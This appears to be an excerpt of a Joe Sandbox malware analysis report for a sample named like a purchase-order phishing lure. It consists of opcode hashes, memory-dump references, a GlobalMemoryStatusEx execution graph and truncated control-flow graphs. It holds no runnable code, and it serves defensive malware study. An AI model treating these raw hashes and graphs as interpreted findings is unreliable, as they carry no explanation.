                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8692257d2ef3aedb6c2b94289f3cc6ff370cd6d894b6ede9708fd4acd401acd9
                                              • Instruction ID: c6385da96be6f44731ddfdac48302777a692781860b5878a852bf8abc865eb6e
                                              • Opcode Fuzzy Hash: 8692257d2ef3aedb6c2b94289f3cc6ff370cd6d894b6ede9708fd4acd401acd9
                                              • Instruction Fuzzy Hash: 9F5101B1D056588BE76CCF678D446CAFAF7AFC8340F14C1FA954CA6254EB740AC58E11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23978763ea28c5ab6072ec479da0d3a9124dcdef3ec1fbcf80ec6db12a96bf4d
                                              • Instruction ID: e095b58177dcdd0a435fffa144585a15732628917ab61c361a8aac09c918ae2b
                                              • Opcode Fuzzy Hash: 23978763ea28c5ab6072ec479da0d3a9124dcdef3ec1fbcf80ec6db12a96bf4d
                                              • Instruction Fuzzy Hash: 58419AB1E056588BEB1CCF6B8C4469EFAF3AFC9300F14C5B9945CAB265DB3149928F41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2170bd7b1f298a039c68d2e99edc16dfacabec903ccca6794dc250afcbf88d06
                                              • Instruction ID: 7d348d48b43937ad9e570079e6bf5d7af209d473645961fa44b1b132d859ed93
                                              • Opcode Fuzzy Hash: 2170bd7b1f298a039c68d2e99edc16dfacabec903ccca6794dc250afcbf88d06
                                              • Instruction Fuzzy Hash: 07414CB1E016188BEB0CCFABC94459EFAF3BFC8300F14C07A9918AB254EB7459428F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89692ccaaac6f729faf4b0b44bc308d093d95ca14037086179dcde1c4aaf5f30
                                              • Instruction ID: 8f45fdced27b2f16bb16f100474ce71917680fcf95370368b334388a9c647dca
                                              • Opcode Fuzzy Hash: 89692ccaaac6f729faf4b0b44bc308d093d95ca14037086179dcde1c4aaf5f30
                                              • Instruction Fuzzy Hash: 3541EDB4D04208DFCB14CFA9D885AEEBBB5BB89310F10A06AE845B7350C735A901CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d68ca4563f843ed2fc6a9d1cdcab6d0b59fdfb434ad2704e2af3b6e491e6f295
                                              • Instruction ID: 756fdff58a07cc9b52bb4d4b2db1387ca18777052dbdd3d8895c0013c07be782
                                              • Opcode Fuzzy Hash: d68ca4563f843ed2fc6a9d1cdcab6d0b59fdfb434ad2704e2af3b6e491e6f295
                                              • Instruction Fuzzy Hash: 854100B9C04258DFDB10CFAAD485AEEFBF5BB49310F14902AE455B7240C738AA45CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb03a5ba682c356f2bdd2479960db134962ef05bfe778b104ef6aca415638bf7
                                              • Instruction ID: 6d5b17755f2ad8e6d466c87c020aa0e31da0e99557cc4a1b0c0c20e1887d0b82
                                              • Opcode Fuzzy Hash: eb03a5ba682c356f2bdd2479960db134962ef05bfe778b104ef6aca415638bf7
                                              • Instruction Fuzzy Hash: FC41EEB5C04258DFDB00CFAAD485AEEFBF4BB49310F14942AE459B7240C738AA45CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e5ee2825c16b0c474b8ee0b72af2436fc3fe6cb661e9191a9e579a29d008e30
                                              • Instruction ID: 3df3ccf6ea1a28b24954ad39ec59990f6b4e91c787c917c201b3541ad53314c4
                                              • Opcode Fuzzy Hash: 3e5ee2825c16b0c474b8ee0b72af2436fc3fe6cb661e9191a9e579a29d008e30
                                              • Instruction Fuzzy Hash: 4441EB70D04619CBEB28CF6BC8497EEBBF6AF89300F14D0A9C458A7251EB740985DF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac1ee50d25082542c6d86972daf58395fa9589781ee45ed2833ce0e9f57719e1
                                              • Instruction ID: a6435ea3f83031359449ac78021737864261dfc4f6fecb5b288c4f9f98c50a12
                                              • Opcode Fuzzy Hash: ac1ee50d25082542c6d86972daf58395fa9589781ee45ed2833ce0e9f57719e1
                                              • Instruction Fuzzy Hash: EA312C71D057549BEB69DF2B8C4478AFBF7AFCA200F04C0EA844CAA225D7740A868F11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 659cde8a87c36e9661d529d2d8a281d760fcf5f2e2e487a84767e3b096856eb3
                                              • Instruction ID: 438b33ababebb4558583a72dc0088e3d0c92ab4de08f7e90e04e3d4757847553
                                              • Opcode Fuzzy Hash: 659cde8a87c36e9661d529d2d8a281d760fcf5f2e2e487a84767e3b096856eb3
                                              • Instruction Fuzzy Hash: C6311C71D046298BEB6CDF5BCC4879AFAF7AFC9300F04C0EA851CA6214DB740A858F01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c5ec300f3e767559e93fb67a5de7743266ae54b1b94b822d47ec69a2762f2df
                                              • Instruction ID: dd3966f25a18154042a728e6818ba89056e20eab12bca606273f6039c1e76bca
                                              • Opcode Fuzzy Hash: 6c5ec300f3e767559e93fb67a5de7743266ae54b1b94b822d47ec69a2762f2df
                                              • Instruction Fuzzy Hash: BA21EDB5C00218DFDB14CFAAD985AEEFBF4BB49310F14902AE809B7210C735A901CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b161941a38c27fd8989777d5e2af7534874340be8527124ac0f3004f4d5e29f
                                              • Instruction ID: 2f453178237384806a35754f41bb7b2e6d76c75f261a9f4e86d72294d1a12fef
                                              • Opcode Fuzzy Hash: 4b161941a38c27fd8989777d5e2af7534874340be8527124ac0f3004f4d5e29f
                                              • Instruction Fuzzy Hash: 9921A871D05658CBEB2CCF6B89486DDFAF7AFC9300F14C4AA9809AA224DB304A458F44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$%$G$`$i
                                              • API String ID: 0-439984575
                                              • Opcode ID: 5b7cb0a2cde789fe72709f7178869aac170597eac08289d30af770c508bcacd5
                                              • Instruction ID: acb4439f91522420884d6b975a9463e7da2b139e0df70e065db4eb6e5d503c29
                                              • Opcode Fuzzy Hash: 5b7cb0a2cde789fe72709f7178869aac170597eac08289d30af770c508bcacd5
                                              • Instruction Fuzzy Hash: FA61BE74901269DFDB64DF68C888B9DBBB2FB09301F2885D9D449A7250CB35AED0CF94

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:27
                                              Total number of Limit Nodes:6
                                              execution_graph 26752 2650848 26754 265084e 26752->26754 26753 265091b 26754->26753 26757 2651340 26754->26757 26763 2651452 26754->26763 26759 2651308 26757->26759 26761 265134b 26757->26761 26758 2651448 26758->26754 26759->26754 26761->26758 26762 2651452 GlobalMemoryStatusEx 26761->26762 26769 2657059 26761->26769 26762->26761 26765 2651356 26763->26765 26766 265145b 26763->26766 26764 2651448 26764->26754 26765->26764 26767 2657059 GlobalMemoryStatusEx 26765->26767 26768 2651452 GlobalMemoryStatusEx 26765->26768 26766->26754 26767->26765 26768->26765 26770 2657063 26769->26770 26771 2657119 26770->26771 26774 5bdce88 26770->26774 26779 5bdce78 26770->26779 26771->26761 26776 5bdce9d 26774->26776 26775 5bdd0b2 26775->26771 26776->26775 26777 5bdd4d0 GlobalMemoryStatusEx 26776->26777 26778 5bdd730 GlobalMemoryStatusEx 26776->26778 26777->26776 26778->26776 26780 5bdce9d 26779->26780 26781 5bdd0b2 26780->26781 26782 5bdd730 GlobalMemoryStatusEx 26780->26782 26783 5bdd4d0 GlobalMemoryStatusEx 26780->26783 26781->26771 26782->26780 26783->26780
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bc12eb3c5434bcb6a4f8f5b535120cf62a4f6a69d6daeb1518578f1e9542342
                                              • Instruction ID: 978009ebf010c95d29329d593f7357aefdd08064a721af2026fb412101ae21ff
                                              • Opcode Fuzzy Hash: 1bc12eb3c5434bcb6a4f8f5b535120cf62a4f6a69d6daeb1518578f1e9542342
                                              • Instruction Fuzzy Hash: 2053FA31D10B5A8ADB11EB68C9446A9F7B1FF99300F51C79AE45877121FB70AAC4CF81
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7aedd75ad30e6b28f932443db5409cc0494c975c98190cbfa3dd9ef958accdf
                                              • Instruction ID: 0cfd45c797cc98d3321cd47a1c52396cbe810d3f9be8c1c9a7353a252b47c12b
                                              • Opcode Fuzzy Hash: b7aedd75ad30e6b28f932443db5409cc0494c975c98190cbfa3dd9ef958accdf
                                              • Instruction Fuzzy Hash: 2B332E31D10B198EDB11EF68C8846ADF7B1FF99300F55C79AE448A7251EB70AAC5CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1251 2653e48-2653eae 1253 2653eb0-2653ebb 1251->1253 1254 2653ef8-2653efa 1251->1254 1253->1254 1255 2653ebd-2653ec9 1253->1255 1256 2653efc-2653f54 1254->1256 1257 2653eec-2653ef6 1255->1257 1258 2653ecb-2653ed5 1255->1258 1265 2653f56-2653f61 1256->1265 1266 2653f9e-2653fa0 1256->1266 1257->1256 1259 2653ed7 1258->1259 1260 2653ed9-2653ee8 1258->1260 1259->1260 1260->1260 1262 2653eea 1260->1262 1262->1257 1265->1266 1267 2653f63-2653f6f 1265->1267 1268 2653fa2-2653fba 1266->1268 1269 2653f71-2653f7b 1267->1269 1270 2653f92-2653f9c 1267->1270 1275 2654004-2654006 1268->1275 1276 2653fbc-2653fc7 1268->1276 1271 2653f7d 1269->1271 1272 2653f7f-2653f8e 1269->1272 1270->1268 1271->1272 1272->1272 1274 2653f90 1272->1274 1274->1270 1277 2654008-2654056 1275->1277 1276->1275 1278 2653fc9-2653fd5 1276->1278 1286 265405c-265406a 1277->1286 1279 2653fd7-2653fe1 1278->1279 1280 2653ff8-2654002 1278->1280 1281 2653fe5-2653ff4 1279->1281 1282 2653fe3 1279->1282 1280->1277 1281->1281 1284 2653ff6 1281->1284 1282->1281 1284->1280 1287 2654073-26540d3 1286->1287 1288 265406c-2654072 1286->1288 1295 26540d5-26540d9 1287->1295 1296 26540e3-26540e7 1287->1296 1288->1287 1295->1296 1297 26540db 1295->1297 1298 26540f7-26540fb 1296->1298 1299 26540e9-26540ed 1296->1299 1297->1296 1301 26540fd-2654101 1298->1301 1302 265410b-265410f 1298->1302 1299->1298 1300 26540ef-26540f2 call 2650ab0 1299->1300 1300->1298 1301->1302 1304 2654103-2654106 call 2650ab0 1301->1304 1305 2654111-2654115 1302->1305 1306 265411f-2654123 1302->1306 1304->1302 1305->1306 1310 2654117-265411a call 2650ab0 1305->1310 1307 2654125-2654129 1306->1307 1308 2654133-2654137 1306->1308 1307->1308 1311 265412b 1307->1311 1312 2654147 1308->1312 1313 2654139-265413d 1308->1313 1310->1306 1311->1308 1316 2654148 1312->1316 1313->1312 1315 265413f 1313->1315 1315->1312 1316->1316
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V*m
                                              • API String ID: 0-2496064713
                                              • Opcode ID: a051790187de373a7e4e480b178e667737e60815b0751ca5d56ae08f2aac19ce
                                              • Instruction ID: 54e694580e6151420bc17ca64a248bc8f67f8cffe47826a11dacec6878489967
                                              • Opcode Fuzzy Hash: a051790187de373a7e4e480b178e667737e60815b0751ca5d56ae08f2aac19ce
                                              • Instruction Fuzzy Hash: 31918E70E00219DFDF10CFA9C8817ADBBF2AF88744F248169E805A7394EB359895CF85
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d33798accb008146aca1d9c45d766569b110488fcc446c3f35a12359f2c6b14
                                              • Instruction ID: c583411ad5f15dffbde747cb664e1215cafa16aefbabf1d0c61e09df6699017b
                                              • Opcode Fuzzy Hash: 6d33798accb008146aca1d9c45d766569b110488fcc446c3f35a12359f2c6b14
                                              • Instruction Fuzzy Hash: 3EB18D70E00219CFDB14CFA9D88179EBBF2AF88354F148669D815E7394EB759881CF81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 505 26547d8-2654864 508 2654866-2654871 505->508 509 26548ae-26548b0 505->509 508->509 511 2654873-265487f 508->511 510 26548b2-26548ca 509->510 518 2654914-2654916 510->518 519 26548cc-26548d7 510->519 512 2654881-265488b 511->512 513 26548a2-26548ac 511->513 514 265488d 512->514 515 265488f-265489e 512->515 513->510 514->515 515->515 517 26548a0 515->517 517->513 521 2654918-265495d 518->521 519->518 520 26548d9-26548e5 519->520 522 26548e7-26548f1 520->522 523 2654908-2654912 520->523 529 2654963-2654971 521->529 524 26548f5-2654904 522->524 525 26548f3 522->525 523->521 524->524 527 2654906 524->527 525->524 527->523 530 2654973-2654979 529->530 531 265497a-26549d7 529->531 530->531 538 26549e7-26549eb 531->538 539 26549d9-26549dd 531->539 541 26549ed-26549f1 538->541 542 26549fb-26549ff 538->542 539->538 540 26549df-26549e2 call 2650ab0 539->540 540->538 541->542 546 26549f3-26549f6 call 2650ab0 541->546 543 2654a01-2654a05 542->543 544 2654a0f-2654a13 542->544 543->544 548 2654a07 543->548 549 2654a15-2654a19 544->549 550 2654a23 544->550 546->542 548->544 549->550 551 2654a1b 549->551 552 2654a24 550->552 551->550 552->552
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V*m$\V*m
                                              • API String ID: 0-3208813770
                                              • Opcode ID: 4029a33c86aafb45a38c6a54332d82a2e69be94f0418a9cd23dc23104ac2c148
                                              • Instruction ID: c6cfd791263be0e57e006e34e59467c5c76a5bba652d820622a5af0b11a3586a
                                              • Opcode Fuzzy Hash: 4029a33c86aafb45a38c6a54332d82a2e69be94f0418a9cd23dc23104ac2c148
                                              • Instruction Fuzzy Hash: 9E714970E00259DFDB14CFA9C8857AEBBF2BF88714F148169E805A7354EB749881CF95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 553 26547cc-2654864 556 2654866-2654871 553->556 557 26548ae-26548b0 553->557 556->557 559 2654873-265487f 556->559 558 26548b2-26548ca 557->558 566 2654914-2654916 558->566 567 26548cc-26548d7 558->567 560 2654881-265488b 559->560 561 26548a2-26548ac 559->561 562 265488d 560->562 563 265488f-265489e 560->563 561->558 562->563 563->563 565 26548a0 563->565 565->561 569 2654918-265492a 566->569 567->566 568 26548d9-26548e5 567->568 570 26548e7-26548f1 568->570 571 2654908-2654912 568->571 576 2654931-265495d 569->576 572 26548f5-2654904 570->572 573 26548f3 570->573 571->569 572->572 575 2654906 572->575 573->572 575->571 577 2654963-2654971 576->577 578 2654973-2654979 577->578 579 265497a-26549d7 577->579 578->579 586 26549e7-26549eb 579->586 587 26549d9-26549dd 579->587 589 26549ed-26549f1 586->589 590 26549fb-26549ff 586->590 587->586 588 26549df-26549e2 call 2650ab0 587->588 588->586 589->590 594 26549f3-26549f6 call 2650ab0 589->594 591 2654a01-2654a05 590->591 592 2654a0f-2654a13 590->592 591->592 596 2654a07 591->596 597 2654a15-2654a19 592->597 598 2654a23 592->598 594->590 596->592 597->598 599 2654a1b 597->599 600 2654a24 598->600 599->598 600->600
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V*m$\V*m
                                              • API String ID: 0-3208813770
                                              • Opcode ID: 656a59b42222bd1d709ddad99dd0de81bd6e139024d6b5ebc6c9982e9730dd20
                                              • Instruction ID: 18164b5f96679512a4a98766ab3fdf2df26b240ec394c9c6b2010dd28a01acdd
                                              • Opcode Fuzzy Hash: 656a59b42222bd1d709ddad99dd0de81bd6e139024d6b5ebc6c9982e9730dd20
                                              • Instruction Fuzzy Hash: DF714870E00269DFDB14CFA9C88179EBBF2BF88714F148169E805A7354DB749882CF95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1218 5bde090-5bde0ab 1219 5bde0ad-5bde0d4 call 5bdd4c0 1218->1219 1220 5bde0d5-5bde0e8 1218->1220 1224 5bde0eb-5bde0f4 call 5bdd808 1220->1224 1227 5bde0fa-5bde138 1224->1227 1228 5bde0f6-5bde0f9 1224->1228 1227->1224 1233 5bde13a-5bde159 1227->1233 1236 5bde15f-5bde1ec GlobalMemoryStatusEx 1233->1236 1237 5bde15b-5bde15e 1233->1237 1241 5bde1ee-5bde1f4 1236->1241 1242 5bde1f5-5bde21d 1236->1242 1241->1242
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1643806871.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_5bd0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 255036b1beb6710c6e7a9d822d0b5cb403f84c85d2328a6cf102a0012dc1841b
                                              • Instruction ID: 75fd83692d194f1d1e1eed5105d21ee536cba90975d0cf5410c683f4430139ff
                                              • Opcode Fuzzy Hash: 255036b1beb6710c6e7a9d822d0b5cb403f84c85d2328a6cf102a0012dc1841b
                                              • Instruction Fuzzy Hash: E841E372E003559FDB14DF69D8007AABBF5EF89210F15856AE409EB341EB78E841CBE0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1245 5bde178-5bde1b6 1246 5bde1be-5bde1ec GlobalMemoryStatusEx 1245->1246 1247 5bde1ee-5bde1f4 1246->1247 1248 5bde1f5-5bde21d 1246->1248 1247->1248
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 05BDE1DF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1643806871.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_5bd0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: d92971bf3a99f1a0bade2dfd85fbe6cb7f919c20aec5f410a20addd489fdcfa3
                                              • Instruction ID: 4034cef0c880edc4d2cfac72f91aa95b278326ed5c5d66e5e3065267ed2f3da8
                                              • Opcode Fuzzy Hash: d92971bf3a99f1a0bade2dfd85fbe6cb7f919c20aec5f410a20addd489fdcfa3
                                              • Instruction Fuzzy Hash: 761126B2D006599BDB10CF9AC444BDEFBF4BF48310F14816AD818A7240D378A944CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1317 2653e3c-2653eae 1319 2653eb0-2653ebb 1317->1319 1320 2653ef8-2653efa 1317->1320 1319->1320 1321 2653ebd-2653ec9 1319->1321 1322 2653efc-2653f54 1320->1322 1323 2653eec-2653ef6 1321->1323 1324 2653ecb-2653ed5 1321->1324 1331 2653f56-2653f61 1322->1331 1332 2653f9e-2653fa0 1322->1332 1323->1322 1325 2653ed7 1324->1325 1326 2653ed9-2653ee8 1324->1326 1325->1326 1326->1326 1328 2653eea 1326->1328 1328->1323 1331->1332 1333 2653f63-2653f6f 1331->1333 1334 2653fa2-2653fba 1332->1334 1335 2653f71-2653f7b 1333->1335 1336 2653f92-2653f9c 1333->1336 1341 2654004-2654006 1334->1341 1342 2653fbc-2653fc7 1334->1342 1337 2653f7d 1335->1337 1338 2653f7f-2653f8e 1335->1338 1336->1334 1337->1338 1338->1338 1340 2653f90 1338->1340 1340->1336 1343 2654008-265401a 1341->1343 1342->1341 1344 2653fc9-2653fd5 1342->1344 1351 2654021-2654056 1343->1351 1345 2653fd7-2653fe1 1344->1345 1346 2653ff8-2654002 1344->1346 1347 2653fe5-2653ff4 1345->1347 1348 2653fe3 1345->1348 1346->1343 1347->1347 1350 2653ff6 1347->1350 1348->1347 1350->1346 1352 265405c-265406a 1351->1352 1353 2654073-26540d3 1352->1353 1354 265406c-2654072 1352->1354 1361 26540d5-26540d9 1353->1361 1362 26540e3-26540e7 1353->1362 1354->1353 1361->1362 1363 26540db 1361->1363 1364 26540f7-26540fb 1362->1364 1365 26540e9-26540ed 1362->1365 1363->1362 1367 26540fd-2654101 1364->1367 1368 265410b-265410f 1364->1368 1365->1364 1366 26540ef-26540f2 call 2650ab0 1365->1366 1366->1364 1367->1368 1370 2654103-2654106 call 2650ab0 1367->1370 1371 2654111-2654115 1368->1371 1372 265411f-2654123 1368->1372 1370->1368 1371->1372 1376 2654117-265411a call 2650ab0 1371->1376 1373 2654125-2654129 1372->1373 1374 2654133-2654137 1372->1374 1373->1374 1377 265412b 1373->1377 1378 2654147 1374->1378 1379 2654139-265413d 1374->1379 1376->1372 1377->1374 1382 2654148 1378->1382 1379->1378 1381 265413f 1379->1381 1381->1378 1382->1382
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V*m
                                              • API String ID: 0-2496064713
                                              • Opcode ID: 8f52058d959c96ff46d4ac50aaff04574eace291596c84f5bd7d9c31ebbd0780
                                              • Instruction ID: cf8eab853c8e3ce7debf0b451c8395d376265045903a3565768837038cf245bd
                                              • Opcode Fuzzy Hash: 8f52058d959c96ff46d4ac50aaff04574eace291596c84f5bd7d9c31ebbd0780
                                              • Instruction Fuzzy Hash: 59918C70E00259DFDB20CFA9C8817EDBBF2AF88744F248169E805A7394DB359895CF95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2947 2657988-265799f 2948 26579a1-26579a4 2947->2948 2949 26579a6-26579cc 2948->2949 2950 26579d1-26579d4 2948->2950 2949->2950 2951 26579d6-26579fc 2950->2951 2952 2657a01-2657a04 2950->2952 2951->2952 2953 2657a06-2657a2c 2952->2953 2954 2657a31-2657a34 2952->2954 2953->2954 2956 2657a36-2657a5c 2954->2956 2957 2657a61-2657a64 2954->2957 2956->2957 2960 2657a66-2657a8c 2957->2960 2961 2657a91-2657a94 2957->2961 2960->2961 2963 2657a96-2657abc 2961->2963 2964 2657ac1-2657ac4 2961->2964 2963->2964 2969 2657ac6-2657aec 2964->2969 2970 2657af1-2657af4 2964->2970 2969->2970 2972 2657af6-2657b1c 2970->2972 2973 2657b21-2657b24 2970->2973 2972->2973 2979 2657b26-2657b4c 2973->2979 2980 2657b51-2657b54 2973->2980 2979->2980 2982 2657b56-2657b7c 2980->2982 2983 2657b81-2657b84 2980->2983 2982->2983 2989 2657b86 2983->2989 2990 2657b91-2657b94 2983->2990 3001 2657b8c 2989->3001 2992 2657b96-2657bbc 2990->2992 2993 2657bc1-2657bc4 2990->2993 2992->2993 2999 2657bc6-2657bec 2993->2999 3000 2657bf1-2657bf4 2993->3000 2999->3000 3002 2657bf6-2657c1c 3000->3002 3003 2657c21-2657c24 3000->3003 3001->2990 3002->3003 3008 2657c26-2657c4c 3003->3008 3009 2657c51-2657c54 3003->3009 3008->3009 3011 2657c56-2657c7c 3009->3011 3012 2657c81-2657c84 3009->3012 3011->3012 3016 2657c86-2657cac 3012->3016 3017 2657cb1-2657cb4 3012->3017 3016->3017 3020 2657cb6-2657cdc 3017->3020 3021 2657ce1-2657ce4 3017->3021 3020->3021 3025 2657ce6-2657d0c 3021->3025 3026 2657d11-2657d14 3021->3026 3025->3026 3030 2657d16-2657d3c 3026->3030 3031 2657d41-2657d44 3026->3031 3030->3031 3035 2657d46-2657d6c 3031->3035 3036 2657d71-2657d74 3031->3036 3035->3036 3040 2657d76-2657d9c 3036->3040 3041 2657da1-2657da4 3036->3041 3040->3041 3045 2657da6-2657dcc 3041->3045 3046 2657dd1-2657dd4 3041->3046 3045->3046 3050 2657dd6-2657dfc 3046->3050 3051 2657e01-2657e04 3046->3051 3050->3051 3055 2657e06-2657e2c 3051->3055 3056 2657e31-2657e34 3051->3056 3055->3056 3060 2657e36-2657e5c 3056->3060 3061 2657e61-2657e64 3056->3061 3060->3061 3065 2657e66-2657e8c 3061->3065 3066 2657e91-2657e94 3061->3066 3065->3066 3070 2657e96-2657eac 3066->3070 3071 2657eb1-2657eb4 3066->3071 3070->3071 3075 2657eb6-2657edc 3071->3075 3076 2657ee1-2657ee4 3071->3076 3075->3076 3083 2657ee6-2657f0c 3076->3083 3084 2657f11-2657f14 3076->3084 3083->3084 3085 2657f16-2657f3c 3084->3085 3086 2657f41-2657f44 3084->3086 3085->3086 3093 2657f55-2657f58 3086->3093 3094 2657f46-2657f48 3086->3094 3095 2657f85-2657f88 